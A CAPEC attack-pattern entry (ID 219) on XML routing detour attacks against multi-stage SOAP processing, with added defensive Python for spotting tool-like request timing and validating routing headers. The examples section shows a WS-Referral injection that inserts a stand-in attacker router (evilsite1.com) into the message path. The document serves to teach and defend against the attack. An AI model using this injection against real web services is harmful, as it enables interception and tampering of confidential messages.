CAPEC-219: XML Routing Detour Attacks (CAPEC List, Version 2.4)
Attack Pattern ID: 219
Abstraction: Standard
Status: Draft
Completeness: Complete
+ Description

Summary

An attacker subverts an intermediate system used to process XML content and forces the intermediate to modify and/or re-route the processing of the content. XML Routing Detour Attacks are man-in-the-middle attacks: the attacker compromises or inserts an intermediate system in the processing of the XML message. For example, WS-Routing can be used to specify a series of nodes or intermediaries through which content is passed. If any of the intermediate nodes in this route are compromised by an attacker, they could be used for a routing detour attack. From the compromised system the attacker is able to route the XML process to other nodes of his or her choice and modify the responses so that the normal chain of processing is unaware of the interception. This system can forward the message to an outside entity and hide the forwarding and processing from the legitimate processing systems by altering the header information.

Attack Execution Flow

Explore
  1. Survey the target:

    Using the command line or an automated tool, an attacker records all instances of web services that process XML requests.

    Attack Step Techniques

    1. Use an automated tool to record all instances that process XML requests, or find exposed WSDL. (Environments: env-Web, env-ClientServer)
    2. Use tools to crawl WSDL. (Environments: env-Web, env-ClientServer)

    Indicators

    1. Positive: The URL processes XML requests. (Environments: env-Web, env-ClientServer)
    2. Inconclusive: The application does not accept XML requests. (Environments: env-Web, env-ClientServer)
Experiment
  1. Identify SOAP messages that have multiple-stage processing:

    Inspect each instance to see whether the XML processing has multiple stages or not.

    Attack Step Techniques

    1. Inspect the SOAP message routing header to see whether the XML processing has multiple stages or not. (Environments: env-Web, env-ClientServer)

    Indicators

    1. Positive: The SOAP message has multiple-stage processing. (Environments: env-Web, env-ClientServer)
    2. Negative: The SOAP message does not have intermediate nodes. (Environments: env-Web, env-ClientServer)

    Outcomes

    1. Success: A list of URLs which have multiple stages to process XML contents.

    Security Controls

    1. Detective: Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
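The detective control above (request velocity and regularity in web logs) can be implemented as a small log analysis. The following is an added example, not part of the CAPEC entry; the log lines are constructed in a Common Log Format variant with millisecond timestamps, the client addresses are documentation ranges, and the thresholds (`min_requests`, `max_mean_gap`, `max_cv`) are assumptions to be tuned per site.

```python
"""Flag clients whose request timing looks tool-driven rather than human.

Added example for CAPEC-219's detective control: per client IP, measure the
gaps between consecutive requests.  Tools tend to request quickly and at a
regular interval (low mean gap, low coefficient of variation); humans are
slow and irregular.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample log (not real traffic).  Format: CLF with .fff seconds.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Apr/2014:12:00:00.000 +0000] "POST /ws/orders HTTP/1.1" 200 512
203.0.113.7 - - [10/Apr/2014:12:00:00.800 +0000] "GET /ws/orders?wsdl HTTP/1.1" 200 2048
203.0.113.7 - - [10/Apr/2014:12:00:01.600 +0000] "POST /ws/invoices HTTP/1.1" 200 512
203.0.113.7 - - [10/Apr/2014:12:00:02.400 +0000] "GET /ws/invoices?wsdl HTTP/1.1" 200 2048
203.0.113.7 - - [10/Apr/2014:12:00:03.200 +0000] "POST /ws/shipping HTTP/1.1" 200 512
198.51.100.4 - - [10/Apr/2014:12:00:05.000 +0000] "GET /index.html HTTP/1.1" 200 1024
198.51.100.4 - - [10/Apr/2014:12:00:19.300 +0000] "GET /products.html HTTP/1.1" 200 1024
198.51.100.4 - - [10/Apr/2014:12:00:47.900 +0000] "POST /ws/orders HTTP/1.1" 200 512
198.51.100.4 - - [10/Apr/2014:12:01:31.100 +0000] "GET /checkout.html HTTP/1.1" 200 1024
"""

# client, ident, user, [timestamp], "request line"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"')
TS_FORMAT = "%d/%b/%Y:%H:%M:%S.%f %z"


def parse_log(text):
    """Group request timestamps by client IP; malformed lines are skipped."""
    events = defaultdict(list)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        events[m.group("ip")].append(datetime.strptime(m.group("ts"), TS_FORMAT))
    return events


def interval_stats(timestamps):
    """Mean inter-request gap and its coefficient of variation (None if < 3 requests)."""
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return None
    mean = statistics.mean(gaps)
    cv = statistics.pstdev(gaps) / mean if mean > 0 else 0.0
    return {"requests": len(ts), "mean_gap": mean, "cv": cv}


def flag_tool_like(events, min_requests=5, max_mean_gap=2.0, max_cv=0.25):
    """Return {ip: stats} for clients that are both fast and regular.

    Thresholds are assumptions: at least `min_requests` requests, a mean gap
    of at most `max_mean_gap` seconds, and a gap spread (CV) of at most `max_cv`.
    """
    flagged = {}
    for ip, stamps in events.items():
        s = interval_stats(stamps)
        if s is None or s["requests"] < min_requests:
            continue
        if s["mean_gap"] <= max_mean_gap and s["cv"] <= max_cv:
            flagged[ip] = s
    return flagged


if __name__ == "__main__":
    for ip, s in flag_tool_like(parse_log(SAMPLE_LOG)).items():
        print(f"{ip}: {s['requests']} requests, mean gap {s['mean_gap']:.2f}s, cv {s['cv']:.2f}")
```

On the constructed log, the first client fires five requests exactly 0.8 s apart (the interval the control cites) and is flagged; the second client's four irregular, widely spaced requests are not.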
Exploit
  1. Launch an XML routing detour attack:

    The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message identified in the Explore phase. Thus, the attacker can route the XML message to the attacker controlled node (and access the message contents).

    Attack Step Techniques

    1. The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message. (Environments: env-Web, env-ClientServer)

    Outcomes

    1. Success: The XML message is routed to the attacker controlled node.

    Security Controls

    1. Preventative: Use SSL for connections between all parties with mutual authentication.
+ Attack Prerequisites
  • The targeted system must have multiple-stage processing of XML content.

+ Typical Severity

Medium

+ Typical Likelihood of Exploit

Likelihood: High

+ Methods of Attack
  • Protocol Manipulation
  • Injection
+ Examples-Instances

Description

Here is an example SOAP call from a client, example1.com, to a target, example4.com, via 2 intermediaries, example2.com and example3.com. (Note: the client here is not necessarily an 'end user client' but rather the starting point of the XML transaction.)

(Attack)

Example SOAP message with routing information in header:

    <S:Envelope>
      <S:Header>
        <m:path xmlns:m="http://schemas.example.com/rp/"
                S:actor="http://schemas.example.com/soap/actor"
                S:mustUnderstand="1">
          <m:action>http://example1.com/</m:action>
          <m:to>http://example4.com/router</m:to>
          <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id>
          <m:fwd>
            <m:via>http://example2.com/router</m:via>
          </m:fwd>
          <m:rev />
        </m:path>
      </S:Header>
      <S:Body>
        ...
      </S:Body>
    </S:Envelope>

Add an additional node (example3.com/router) to the XML path in a WS-Referral message:

    <r:ref xmlns:r="http://schemas.example.com/referral">
      <r:for>
        <r:prefix>http://example2.com/router</r:prefix>
      </r:for>
      <r:if/>
      <r:go>
        <r:via>http://example3.com/router</r:via>
      </r:go>
    </r:ref>

(Result)

Resulting in the following SOAP Header:

    <S:Envelope>
      <S:Header>
        <m:path xmlns:m="http://schemas.example.com/rp/"
                S:actor="http://schemas.example.com/soap/actor"
                S:mustUnderstand="1">
          <m:action>http://example1.com/</m:action>
          <m:to>http://example4.com/router</m:to>
          <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id>
          <m:fwd>
            <m:via>http://example2.com/router</m:via>
            <m:via>http://example3.com/router</m:via>
          </m:fwd>
          <m:rev />
        </m:path>
      </S:Header>
      <S:Body>
        ...
      </S:Body>
    </S:Envelope>

In the following example, the attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header without accessing the message directly on the initiator/intermediary node that he/she has targeted.

(Attack)

Example of WS-Referral based WS-Routing injection of the bogus node route:

    <r:ref xmlns:r="http://schemas.example.com/referral">
      <r:for>
        <r:prefix>http://example2.com/router</r:prefix>
      </r:for>
      <r:if/>
      <r:go>
        <r:via>http://evilsite1.com/router</r:via>
      </r:go>
    </r:ref>
(Result)

Resulting XML Routing Detour attack:

    <S:Envelope>
      <S:Header>
        <m:path xmlns:m="http://schemas.example.com/rp/"
                S:actor="http://schemas.example.com/soap/actor"
                S:mustUnderstand="1">
          <m:action>http://example1.com/</m:action>
          <m:to>http://example4.com/router</m:to>
          <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id>
          <m:fwd>
            <m:via>http://example2.com/router</m:via>
            <m:via>http://evilsite1.com/router</m:via>
            <m:via>http://example3.com/router</m:via>
          </m:fwd>
          <m:rev />
        </m:path>
      </S:Header>
      <S:Body>
        ...
      </S:Body>
    </S:Envelope>

Thus, the attacker can route the XML message to the attacker controlled node (and access the message contents).

+ Attacker Skills or Knowledge Required

Skill or Knowledge Level: Low

To inject a bogus node into the XML routing table.

+ Resources Required

The attacker must be able to insert or compromise a system into the processing path for the transaction.

+ Solutions and Mitigations

Design: Specify the maximum number of intermediate nodes for the request and require SSL connections with mutual authentication.

Implementation: Use SSL for connections between all parties with mutual authentication.
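The design mitigation (a maximum number of intermediate nodes) is only useful if a receiving node actually checks the routing header before processing the body. The following is an added example, not code from CAPEC or from any WS-Routing implementation: it parses the `<m:path>` header shown in the Examples-Instances section and rejects a message whose `<m:via>` hops exceed a configured limit or name a router outside a trust list, so the referral-injected `evilsite1.com` hop above is caught. Assumptions: the SOAP 1.1 envelope namespace is declared as `xmlns:S` (the CAPEC fragment omits it), and the trust list and hop limit are constructed policy values.

```python
"""Validate a WS-Routing <m:path> header against a routing policy.

Added example for CAPEC-219 mitigations: a receiving node or gateway checks
that every forward hop (<m:via>) is a known, trusted router and that the hop
count stays within a configured maximum, and refuses the message otherwise.
"""
import xml.etree.ElementTree as ET

# The rp/ namespace is the one used in the CAPEC sample; the envelope
# namespace is the SOAP 1.1 one, assumed here because the sample omits it.
NS = {
    "S": "http://schemas.xmlsoap.org/soap/envelope/",
    "m": "http://schemas.example.com/rp/",
}

# Constructed policy: the legitimate routers from the CAPEC example and a
# hop limit matching the two intermediaries the example expects.
TRUSTED_ROUTERS = {
    "http://example2.com/router",
    "http://example3.com/router",
    "http://example4.com/router",
}
MAX_INTERMEDIATE_NODES = 2


def make_message(vias):
    """Build a SOAP envelope carrying the CAPEC-style routing header (helper for the demo)."""
    via_xml = "".join(f"<m:via>{v}</m:via>" for v in vias)
    return f"""<S:Envelope xmlns:S="{NS['S']}">
  <S:Header>
    <m:path xmlns:m="{NS['m']}" S:actor="http://schemas.example.com/soap/actor" S:mustUnderstand="1">
      <m:action>http://example1.com/</m:action>
      <m:to>http://example4.com/router</m:to>
      <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id>
      <m:fwd>{via_xml}</m:fwd>
      <m:rev />
    </m:path>
  </S:Header>
  <S:Body>...</S:Body>
</S:Envelope>"""


def validate_path(xml_text, trusted=TRUSTED_ROUTERS, max_hops=MAX_INTERMEDIATE_NODES):
    """Return a list of policy violations; an empty list means the route is acceptable."""
    root = ET.fromstring(xml_text)
    path = root.find("S:Header/m:path", NS)
    if path is None:
        return ["no routing header present"]

    problems = []
    # The final destination must itself be a router we trust.
    to = path.findtext("m:to", default="", namespaces=NS).strip()
    if to not in trusted:
        problems.append(f"final destination not trusted: {to}")

    # Every forward hop is checked against the hop limit and the trust list;
    # a referral-injected detour shows up as an extra, unknown <m:via>.
    vias = [v.text.strip() for v in path.findall("m:fwd/m:via", NS) if v.text]
    if len(vias) > max_hops:
        problems.append(f"{len(vias)} intermediate nodes exceeds limit of {max_hops}")
    for hop in vias:
        if hop not in trusted:
            problems.append(f"untrusted intermediate node: {hop}")
    return problems


if __name__ == "__main__":
    legit = make_message(["http://example2.com/router", "http://example3.com/router"])
    detour = make_message(["http://example2.com/router",
                           "http://evilsite1.com/router",
                           "http://example3.com/router"])
    print("legitimate route:", validate_path(legit) or "accepted")
    print("detoured route:  ", validate_path(detour))
```

The check belongs at every node that honours `<m:path>`, not only at the final receiver, since the detour happens before the message reaches example4.com. It complements, rather than replaces, mutually authenticated SSL between the parties: transport authentication stops an outsider from inserting itself on the wire, while the header check stops a referral-injected hop from being followed at all.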

+ Attack Motivation-Consequences
Scope / Technical Impact:
  • Integrity: Modify application data
  • Confidentiality: Read application data
  • Accountability, Authentication, Authorization, Non-Repudiation: Gain privileges / assume identity
  • Access_Control, Authorization: Bypass protection mechanism
+ Injection Vector

The routing table of the XML Header

+ Payload

The bogus routing node in the routing table of XML header

+ Activation Zone

The route between the XML message sender and receiver.

+ Payload Activation Impact

Description

Information Leakage

+ Purposes
  • Exploitation
+ CIA Impact
Confidentiality Impact: High
Integrity Impact: Medium
Availability Impact: Low
+ Technical Context
Architectural Paradigms
Client-Server
Frameworks
All
Platforms
All
+ References
[R.219.1] [REF-1] "WASC Threat Classification 2.0". WASC-32 - Routing Detour. The Web Application Security Consortium (WASC). 2010. <http://projects.webappsec.org/w/page/13246956/Routing-Detour>.
[R.219.2] [REF-14] Andre Yee. "Threat Protection in a Service Oriented World". NFR Security. <http://www.unatekconference.com/images/pdfs/presentations/Yee.pdf>.
[R.219.3] [REF-15] Pete Lindstrom. "Attacking & Defending Web Services". SPiRE Security. 2002. <http://www.webtorials.com/main/comnet/cn2003/web-service/24.pdf>.
+ Content History
Modifications
  • Min Xu (Cigital, Inc.): Pre-review - 0.1
  • Romain Gaucher (Cigital, Inc.): Performed a review of content and added additional content
  • CAPEC Content Team (The MITRE Corporation), 2014-02-06: Updated Attack_Phases, Examples-Instances (Source: Internal)

Page Last Updated: April 10, 2014